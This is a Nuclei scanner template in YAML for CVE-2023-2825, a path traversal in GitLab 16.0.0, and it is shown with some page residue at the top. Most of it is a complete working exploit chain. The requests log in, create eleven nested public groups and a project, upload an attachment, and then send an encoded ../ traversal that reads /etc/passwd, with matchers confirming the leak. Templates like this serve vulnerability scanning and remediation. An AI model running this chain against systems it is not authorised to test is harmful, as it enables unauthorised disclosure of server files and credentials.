213 lines
7.8 KiB
YAML
213 lines
7.8 KiB
YAML
id: CVE-2023-2825
|
|
|
|
info:
|
|
name: GitLab 16.0.0 - Path Traversal
|
|
author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
|
|
severity: high
|
|
description: |
|
|
An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
|
|
remediation: |
|
|
Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
|
|
reference:
|
|
- https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
|
|
- https://github.com/Occamsec/CVE-2023-2825
|
|
- https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-2825
|
|
- https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-2825
|
|
cwe-id: CWE-22
|
|
epss-score: 0.09134
|
|
epss-percentile: 0.94495
|
|
cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 16
|
|
vendor: gitlab
|
|
product: gitlab
|
|
shodan-query: title:"Gitlab"
|
|
tags: cve2023,cve,gitlab,lfi,kev,authenticated,intrusive
|
|
variables:
|
|
data: "{{rand_base(5)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /users/sign_in HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /users/sign_in HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Accept: */*
|
|
|
|
user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Accept: */*
|
|
|
|
group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
POST /groups HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
|
|
- |
|
|
@timeout: 15s
|
|
POST /projects HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
|
|
- |
|
|
POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
X-CSRF-Token: {{x-csrf-token}}
|
|
Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6
|
|
|
|
--0ce2a9fbe06b6da89c138a35a1765ed6
|
|
Content-Disposition: form-data; name="file"; filename="{{randstr}}"
|
|
|
|
{{randstr}}
|
|
--0ce2a9fbe06b6da89c138a35a1765ed6--
|
|
- |
|
|
GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
|
|
host-redirects: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 726f6f743a78
|
|
encoding: hex
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/octet-stream
|
|
- etc%2Fpasswd
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: token_1
|
|
group: 1
|
|
regex:
|
|
- name="authenticity_token" value="([A-Za-z0-9_-]+)"
|
|
internal: true
|
|
part: body
|
|
|
|
- type: regex
|
|
name: token_2
|
|
group: 1
|
|
regex:
|
|
- name="csrf\-token" content="([A-Z_0-9a-z-]+)"
|
|
internal: true
|
|
part: body
|
|
|
|
- type: regex
|
|
name: parent_id
|
|
group: 1
|
|
regex:
|
|
- href="\/groups\/new\?parent_id=([0-9]+)
|
|
internal: true
|
|
part: body
|
|
|
|
- type: regex
|
|
name: namespace_id
|
|
group: 1
|
|
regex:
|
|
- ref="\/projects\/new\?namespace_id=([0-9]+)
|
|
internal: true
|
|
part: body
|
|
|
|
- type: regex
|
|
name: x-csrf-token
|
|
group: 1
|
|
regex:
|
|
- const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
|
|
internal: true
|
|
part: body
|
|
|
|
- type: regex
|
|
name: upload-hash
|
|
group: 1
|
|
regex:
|
|
- '"url":"\/uploads\/([0-9a-z]+)\/'
|
|
internal: true
|
|
part: body
|
|
# digest: 4a0a00473045022100fce13295307498034c0bfb69917e3f2561064c0812d5c1a8e27c0bcae996910102202f9c489427503620b35cc6d39d3bbc7826a351b2fd88f2c05ef19a5016ccfd70:922c64590222798bb761d5b6d8e72950 |